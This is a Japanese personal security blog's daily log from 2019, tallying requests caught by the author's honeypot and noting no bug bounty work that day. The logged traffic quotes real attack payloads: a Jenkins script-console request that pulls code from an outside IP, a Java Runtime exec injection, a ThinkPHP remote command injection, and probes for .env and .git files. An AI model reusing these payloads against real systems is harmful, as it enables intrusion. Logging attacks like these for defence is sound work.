Nickセキュリティログ

ハニーポット、バグバウンティ、CTFなどなどセキュリティ関係のことを備忘録がてら書いていきます

【バグバウンティ】 2019年5月30日 活動日記【ハニーポット】

f:id:NickShadows:20190530220059j:plain:w600

※hackerone経由で公式にwebの調査をしています。

ハニーポット

トップ画面

f:id:NickShadows:20190530215311p:plain:w600


直近1ヶ月折れ線グラフ

f:id:NickShadows:20190530215329p:plain:w600


GETリクエスト
no uri Co
1 / 43
2 *1 8
3 /manager/html 3
4 /wp4/wp-login.php 1
5 /wp6/wp-login.php 1
6 /forum1/wp-login.php 1
7 /wordpress5/wp-login.php 1
8 /wordpress6/wp-login.php 1
9 /TP/public/index.php 1
10 /wp1/wp-login.php 1
11 /wp2/wp-login.php 1
12 /blog/wp-login.php 1
13 /app/.env 1
14 /wp7/wp-login.php 1
15 /wordpress1/wp-login.php 1
16 /.git/config 1
17 /Temporary_Listen_Addresses/SMSSERVICE 1
18 /wp3/wp-login.php 1
19 /wordpress9/wp-login.php 1
20 /wordpress7/wp-login.php 1
21 /wordpress3/wp-login.php 1
22 /testget?q=23333&port=80 1
23 /forum/wp-login.php 1
24 /test/wp-login.php 1
25 /myblog/wp-login.php 1
26 /wordpress8/wp-login.php 1
27 /wordpress2/wp-login.php 1
28 /wp8/wp-login.php 1
29 /HNAP1/ 1
30 /wordpress/wp-login.php 1
31 /wp/wp-login.php 1
32 /wp5/wp-login.php 1
33 /siteblog/wp-login.php 1

*1

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD; 


POSTリクエスト
no uri request_body Co
1 /azenv.php?auth=155913765309941&a=PC&i=873348332&p=8080 testPost=true 1
2 /users?page=&size=5 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword= 1
3 /TP/public/index.php?s=captcha _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig 1


pypmyadminユーザー

アクセスなし


pypmyadminパスワード

アクセスなし


wordpressユーザー

アクセスなし


wordpressパスワード

アクセスなし


tomcatユーザー
no user Co
1 3


tomcatパスワード
no user Co
1 3


直近24時間新着アクセス

なし


まとめ

POSTリクエストにリクエストボディを追加しました(当たり前)
それ以外は特に無いです。

バグバウンティ

やろうとしたこと

予定するのを忘れました。。。

やったこと

なし
slackなどは見ましたが、やったことに含むレベルではなかったです。

次やりたいこと
  1. js難読化解読ツールの検証
  2. 実践

気になったニュースなど

追えませんでした。。。